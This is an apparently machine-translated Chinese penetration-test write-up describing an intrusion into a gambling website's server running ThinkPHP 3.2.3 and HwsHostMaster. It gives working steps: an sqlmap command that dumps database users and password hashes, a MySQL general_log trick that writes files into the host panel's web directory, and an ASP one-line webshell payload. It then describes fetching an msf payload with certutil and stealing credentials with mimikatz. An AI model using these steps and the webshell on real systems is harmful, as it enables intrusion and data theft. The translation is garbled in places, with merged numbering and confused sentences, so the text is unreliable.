Title: Remember the use of the guardian god by spinach station

Because this site came from a few months ago, the pictures may not be complete and there is no way to make up for them.

When I was writing this article, the couple next door was applauding, and the sound was loud, which made me not have my mind written once, and I might have written a little confused. It is also worth mentioning that why do we often encounter such people next door when we are safe?

Known target website

The customer has given this kind of website before, so I remember it very deeply. For this kind of website, you can usually give up the normal testing process directly, because experience tells me that the main website function of the website is basically rarely vulnerable, so you can only start from the side station.

Ctrl+u checked the wave of JS without finding any leaks. Looking back, I found that there was a discount activity hall in the upper right corner of the website

The page seems familiar after opening

I clicked on an activity and seemed to be able to submit text at will. There was no filtering. I entered xss with confidence and submitted. However, two days passed and it was useless. My mood was like clouds, fog and rain.

However, I found that there is a review progress query below. After opening it, you will be asked to enter the user name. Since you have entered the user name, it should be a query that is brought into the database. I habitually added a 'click query. 10 seconds passed and there was no response. I was confused. Entering a normal and non-existent account test will pop up, but the query with single quotes has no response at all.

When I caught the packet in F12-network, I found that there was a sending request. It was obvious that there was an injection, and the error was reported that the page was thinkphp. From the bottom corner, the version was 3.2.3. This version is really HC's favorite, from porn to loan platforms, and then to spinach, it is all this version of thinkphp.

Try injecting a wave first

Sqlmap got the administrator account and password in one wave. Suddenly I realized that I didn’t have a background address, and it was useless to get it.

Fofa got the real IP in one wave and found that the phpmyadmin service exists on port 999, and 6588 has an Asp station titled Guardian and Host Master. Directory blasting, port scanning, subdomain mining, no background address was found.

Os-shell succeeded, but nothing I typed.

The same goes for Sql-shell. After careful observation, I found that the website path is installed in the guardian god.

It may be that the guard god intercepted it. At that time, I was still wondering what it means to use the guard god in this php site.

It was not until I went to Baidu to find hwshostmaster ten minutes later that I realized how ignorant I was. It turned out that the guard god was not just waf, he also had a service called host master, and the functions were probably the same as phpstudy.

Observing local installation, I found that after the host master is installed by default, phpmyadmin will be started on port 999, and port 6588 will be launched on port 6, which is consistent with the target IP port I observed.

Since the target site has phpmyadmin, I can try to use SQLmap to enumerate the other party's database account and password hash.

Sqlmap –r sql.txt--string='Surname' --users --password

Sqlmap enumerates root and test. The root password has not been cracked, but the test password has been cracked to 1234. Login successfully.

Regarding this situation, there is an article in the Black and White Day official account of Mu Shen’s Black and White Day summary that has been written in detail. When Mu Shen saw this article, please ask me to pay the advertising fee.

There are generally two methods for gettingshell from mysql database, intooutfile, and export logs.

According to the file address of the injected error page

Construct statement select 1 into outfile 'D:/wwwroot/xxx.com/web/1.txt' error #1 - Can't create/write to file, it should not have permission

Try to use log writing, turn on the log first, and then

set global general_log_file=' D:\\wwwroot\\xxx.com\\web\\a.php' It seems that it still doesn't work, I cracked.

Suddenly I thought, since this wwwroot directory does not have permission, can the management page of the Guardian Host Master? After flipping through the host master file installed locally, you can confirm that the absolute path of the management page of the host master is D:\Hws.com\HwsHostMaster\host\web, try to modify the log

Set global general_log_file=' D:\\Hws.com\\HwsHostMaster\\host\\web\\1.asp' succeeded.

Then execute select "%eval request('chopper')%" to access http://xxx.xxx.xxx.xxx:6588/1.asp error 404. This problem has been difficult for me for a long time. Later I found out that I need to replace the log file with other ones so that the current log file can be accessed. Cknife connection is successful

Whoami found that it was system permission, so the rest was simple. In order to prevent the guards from checking and killing, a msf is generated. It is downloaded through certutil, and then executed. msf is launched online, and then the migration process is loadmimikatz. After one set, I got the remote account password, took off my pants and packed the source code, submitted it to the customer, and it was done. Summary: 1. The main site has no loopholes. Take action on the side station. Here, from the promotional activity funding hall, you find that there is a registration page. You can try to nest an online xss script to obtain the administrator cookie information, but you have not obtained cookie2. In the review progress query, enter the real username and add a single quote. The page does not correspond. F12 found that there was an error on the page, which is thinkphp, and the version is 3.2.33. Inject it through sqlmap to obtain the hash value used. Here you get the hash value of root and test, which can decrypt the hash value of test. Sqlmap –r sql.txt --string='Surname' --users --password4. Query the other ports of the corresponding IP of the target website through fofa, and found that there are ports 999 and 6588, including 999-bit phpmyadmin ports and 6588-bit escort god management interface. 5. Enter the phpmyadmin background through test, and according to the physical path of the website displayed by the injection error, you can write to webshell6 through the into out import method. First write to the web directory, and display that there is no permission select 1 into outfile 'D:/wwwroot/xxx.com/web/1.txt'7. Turn on the log log, find it or fail set global general_log_file=' D:\\wwwroot\\xxx.com\\web\\a.php'8. Since the wwwroot directory does not have permission, can the Guardian Host Master Management Page be used? flip through the local installed host master file, and you can confirm that the absolute path of the host master's management page is D:\Hws.com\HwsHostMaster\host\web. Try to modify the log Set global general_log_file=' D:\\Hws.com\\HwsHostMaster\\host\web\1.asp'9. Then execute select "%eval request('chopper')%" 10. Connect successfully through knife

Reprinted from the original text connection: https://mp.weixin.qq.com/s?__biz=Mzg4NTUwMzM1Ng==mid=2247486068idx=2sn=4e32251aaf8c25efee653b3314a05a29chksm=cfa6ae67f8d127715b23c7b8403a08ccfac2e1bff2ac68030401d54698bcb10cd637a55f7d15scene=178cur_album_id=1553386251775492098#rd